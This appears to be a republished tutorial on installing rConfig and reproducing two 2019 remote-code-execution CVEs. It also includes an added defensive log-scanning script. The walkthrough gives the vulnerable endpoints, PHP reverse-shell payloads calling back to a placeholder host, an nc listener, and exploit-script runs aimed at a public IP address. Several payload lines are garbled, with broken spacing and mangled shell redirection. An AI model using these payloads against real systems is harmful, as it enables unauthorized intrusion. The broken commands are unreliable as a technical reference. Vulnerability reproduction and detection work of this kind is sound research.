2025-02-23 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article covers how to build an rConfig environment and reproduce the rConfig CVE vulnerabilities. Many people may not be familiar with the topic, so the steps are summarized below.
rConfig is an open source network device configuration management utility that network engineers can use to take frequent snapshots of the configuration of their network devices. rConfig is unique in that you select the commands to run against the device.
Simply configure rConfig with the list of commands you want to apply to a device category, and then add devices to that category. Create a scheduled task and rConfig does the rest. rConfig version 3 also has a configuration compliance management utility that lets you monitor device configurations for policy compliance.
I. Environment setup
rConfig installation
cd /home
curl -O https://www.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"
chmod +x install_rConfig.sh
./install_rConfig.sh
Running the install script produced an error. Let's open the source to see why it cannot connect.
It turns out that the script uses curl to reach Google to determine whether there is network connectivity. We could simply change that to www.baidu.com, but later installation steps may also hit connections that are blocked by the firewall, so to be on the safe side, use a proxy. Here I use an ss instance on my intranet, proxied through proxychains4.
After that, the installation proceeds normally.
When the installation finishes, there will be a centos7_postReboot.sh file.
After running it, we can see that the installation is complete. The rest is configured on the web page.
Go to the https://192.168.157.130/install page for the subsequent installation steps.
At this point the installation is complete. The default account and password are admin / admin.
II. Reproducing the vulnerabilities
rConfig 3.9.2 and earlier contain an unauthenticated command execution vulnerability. The installation directory is not automatically deleted after installation, which allows unauthenticated users to execute arbitrary commands as the web server user through the ajaxServerSettingsChk.php file.
CVE-2019-16662: reproducing the rConfig 3.9.2 remote command execution vulnerability
To make this concrete, I have built an rConfig 3.9.2 system on a server. Now let's capture a request and reproduce the vulnerability.
We replace the path with the vulnerable one: /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=
Next we URL-encode the command and put it in the parameter.
Now that our echo output has come back, let's try bouncing back a shell.
Encode url; php-r'$sock=fsockopen ("XX.XX.XX.XX", 6633); exec ("/ bin/sh-I & 3 2 > & 3");'#
On another public server, listen with nc -lvnp 6633
After sending the request with the parameter added, you can see that the shell has bounced back.
Using the CVE-2019-16662 exploit script
python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634
CVE-2019-16663: reproducing the rConfig 3.9.2 remote command execution vulnerability
This RCE requires authentication and is located in the lib/crud/search.crud.php file.
After logging in successfully, capture the request, replace the path with the one for this RCE, and URL-encode the payload that bounces back a shell.
& & php-r'$sock=fsockopen ("XX.XX.XX.XX", 6635); exec ("/ bin/sh-I & 3 2 > & 3");'#
Listen, send the request, and the shell bounces back successfully.
Using the CVE-2019-16663 exploit script
python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636
CVE-2019-19509: rConfig 3.9.3 remote command execution vulnerability
Because the 3.9.3 installation package has been officially removed, it cannot be reproduced now, but an exploit is already available on the Internet.
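For the defending side, the requests described in both the CVE-2019-16662 and CVE-2019-16663 sections leave a recognizable trace in the web server access log. The following is an added example, not code from the original article or from the rConfig project: it scans log lines for the two paths named above and flags parameters carrying shell metacharacters. The combined log layout, the sample lines, and the search parameter name `q` are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Paths named in the article; the combined-log layout below is an assumption.
INSTALL_PATH = "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"
SEARCH_PATH = "/lib/crud/search.crud.php"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Characters that let a parameter value break out into a shell command.
SHELL_META = re.compile(r"[;&|`$<>\n]")

def classify(line):
    """Return (client_ip, finding) for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    url = urlsplit(target)
    # parse_qsl percent-decodes values, so encoded metacharacters are seen too.
    params = parse_qsl(url.query, keep_blank_values=True)
    injected = [k for k, v in params if SHELL_META.search(v)]
    if url.path == INSTALL_PATH:
        if injected:
            return ip, "CVE-2019-16662 pattern: shell metacharacters in " + ",".join(injected)
        # Any hit here means the install directory was never removed.
        return ip, "install handler still reachable (status %s)" % status
    if url.path == SEARCH_PATH and injected:
        return ip, "CVE-2019-16663 pattern: shell metacharacters in " + ",".join(injected)
    return None

# Constructed sample lines (documentation-range IPs, harmless echo values;
# the parameter name "q" is hypothetical).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jun/2020:10:00:01 +0000] "GET /login.php HTTP/1.1" 200 512
198.51.100.7 - - [01/Jun/2020:10:00:05 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3Becho%20test%20%23 HTTP/1.1" 200 64
203.0.113.9 - - [01/Jun/2020:10:02:11 +0000] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=root HTTP/1.1" 200 64
203.0.113.9 - - [01/Jun/2020:10:03:40 +0000] "GET /lib/crud/search.crud.php?q=%26%26echo%20test%20%23 HTTP/1.1" 200 64
203.0.113.9 - - [01/Jun/2020:10:04:02 +0000] "GET /lib/crud/search.crud.php?q=router HTTP/1.1" 200 900
"""

def scan(text):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

Any finding on the install handler path, with or without metacharacters, indicates the installation directory is still present and should be removed.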